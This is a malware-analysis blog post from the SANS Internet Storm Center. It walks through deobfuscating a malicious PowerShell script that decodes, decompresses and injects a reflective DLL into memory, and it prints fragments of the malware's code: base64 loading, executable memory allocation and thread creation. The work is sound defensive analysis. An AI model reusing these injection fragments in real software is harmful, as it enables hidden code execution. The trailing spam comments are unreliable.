Bypassing PowerShell Strong Obfuscation

    Published: 2023-03-30
    Last Updated: 2023-03-30 07:40:48 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Yesterday, I found a malicious PowerShell script that was heavily obfuscated. The filename is “B0A4.ps1"[1] (SHA256:b4814c8db16ecdd7904e81186715bf2a4b4ba28ef5853a41a8f59824f47f8f24), reported with a very low score on VirusTotal: 6/58. The file size is abnormal for a script like this (496KB). A first look at it reveals that it has been strongly obfuscated:

    Set-StrictMode -Version 2
    
    function fZbO
    {
    $nIQwY=LUHF u P 5 r s n a / h 7 w
    $DED6=IcvBw 0 o V C 7 '2' 5 H H
    $iUFxY=ItwnJ l j z E R n D n w
    $cxQYE8=vmijz 6 L w c R 4 '1'
    $oAOe=SvowPc L V 3 c m 0 K 3 K
    $cG6n05=EHjwCm '6' 3 v 6 F g E u v 5
    $GjD=ZlTg T p b j T 4 + x
    $oAOe+$iUFxY+$cxQYE8+$cG6n05+$DED6+$nIQwY+$GjD
    }
    function YIPdR
    {
    TrzF (DdOL) (bDgNo) (jzgg) (Tkdr) (CMFi) (FlILs)
    ...

    The script is based on a multitude of small functions:

    remnux@remnux:/MalwareZoo/20230329$ grep function B0A4.ps1 | wc -l
    2256

    Obfuscation techniques are often frustrating. If you’re working on an incident, you don’t have time to investigate everything and understand how they work from A to Z. Especially if it’s a nice one like the above. You need to understand what the script will perform as soon as possible and move forward. My advice is to start reversing from the 1st called function.

    Here, the script last line is a call to the function ‘KvcsVo’:

    function KvcsVo
    {
    $sYrJ=(MJFr)
    $A12J8=46384
    $hyM8Hj=128512
    $A1p=[System.Convert]::FromBase64String($sYrJ)
    $G9Ycm=hCsN $A1p
    $k9V=qoLLFT $hyM8Hj
    $yWLdo=$G9Ycm.Read($k9V, 0, $hyM8Hj)
    WSmgh $k9V $A12J8
    }

    Bingo, we can read “FromBase64String”. Load the script in a PowerShell debugger to speed up the analysis. Microsoft provides a debugger in the “PowerShell ISE” tool. Search for FromBase64String and set a breakpoint:

    Once the breakpoint is reached, we can dump the content of variables, and after a few "step into", you will understand what will happen. The payload is deobfuscated:

    function hCsN
    {
    Param ($EypP)
    New-Object IO.Compression.DeflateStream([IO.MemoryStream][Byte[]]$EypP,[IO.Compression.CompressionMode]::Decompress)
    }
    

    Now, on the following line, the variable '$k9V' will contain the payload that will probably be injected in memory:

    WSmgh $k9V $A12J8

    Indeed:

    function WSmgh
    {
    Param ($ikJ1M,$EyS5sM)
    $cCio=OAUdti
    $daz=$cCio.Invoke([IntPtr]::Zero, $ikJ1M.Length+0,0x3000, 0x40)
    $GSyjgL=yzMfZ $ikJ1M $daz
    $t0CnJl=qgJC
    $I0zg=$t0CnJl.Invoke([IntPtr]::Zero,0,[Int64]$daz+$EyS5sM,[IntPtr]::Zero,0,[IntPtr]::Zero)
    $SbWY=isBl
    $wyFU=$SbWY.Invoke($I0zg, 0xffffffff) | Out-Null
    }

    You recognise the classic parameter for a VirtualAlloc() call with the 0x40 (PAGE_EXECUTE_READWRITE). We can also find in the script code related to Assemblies to inject the payload in memory.

    '$k9V' can now be dumped into a file, and we have a brand new DLL to investigate:

    remnux@remnux:/MalwareZoo/20230329$ peframe payload.dll
    --------------------------------------------------------------------------------
    File Information (time: 0:00:20.881379)
    --------------------------------------------------------------------------------
    filename         payload.dll
    filetype         PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    filesize         128512
    hash sha256      bbf6413bd1c156ae4569ec8ca3c8d803e8739405f3348a9713ab4149afcf0363
    virustotal       /
    imagebase        0x180000000 *
    entrypoint       0x2bd8
    imphash          67338adb4c5d3b6e6f876d5ca7678226
    datetime         2020-11-12 13:11:45
    dll              True
    directories      import, export, tls, resources, relocations
    sections         .rdata, .data, .pdata, .rsrc, .reloc, .text *
    features         packer
    
    --------------------------------------------------------------------------------
    Yara Plugins
    --------------------------------------------------------------------------------
    IsPE64
    IsDLL
    IsWindowsGUI
    HasRichSignature
    
    --------------------------------------------------------------------------------
    Behavior
    --------------------------------------------------------------------------------
    Xor
    
    --------------------------------------------------------------------------------
    Packer
    --------------------------------------------------------------------------------
    Microsoft Visual Cpp 80 DLL
    
    --------------------------------------------------------------------------------
    Sections Suspicious
    --------------------------------------------------------------------------------
    .text            6.32
    
    --------------------------------------------------------------------------------
    Import function
    --------------------------------------------------------------------------------
    KERNEL32.dll     4
    ADVAPI32.dll     2
    
    --------------------------------------------------------------------------------
    Export function
    --------------------------------------------------------------------------------
    export           [{'offset': 6442500400, 'function': 'ReflectiveLoader'}]

    The DLL[2] was pretty old and uploaded on VirusTotal in June 2021! I tried to detonate it in my sandbox, but no activity was detected.

    [1] https://bazaar.abuse.ch/sample/b4814c8db16ecdd7904e81186715bf2a4b4ba28ef5853a41a8f59824f47f8f24/
    [2] https://bazaar.abuse.ch/sample/bbf6413bd1c156ae4569ec8ca3c8d803e8739405f3348a9713ab4149afcf0363/

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    0 comment(s)
    ISC Stormcast For Thursday, March 30th, 2023 https://isc.sans.edu/podcastdetail.html?id=8432

      Comments

      cwqwqwq
      eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
      WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
      dwqqqwqwq mashood
      [https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
      [https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
      What's this all about ..?
      password reveal .
      <a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

      <a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

      <a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
      https://thehomestore.com.pk/

      Diary Archives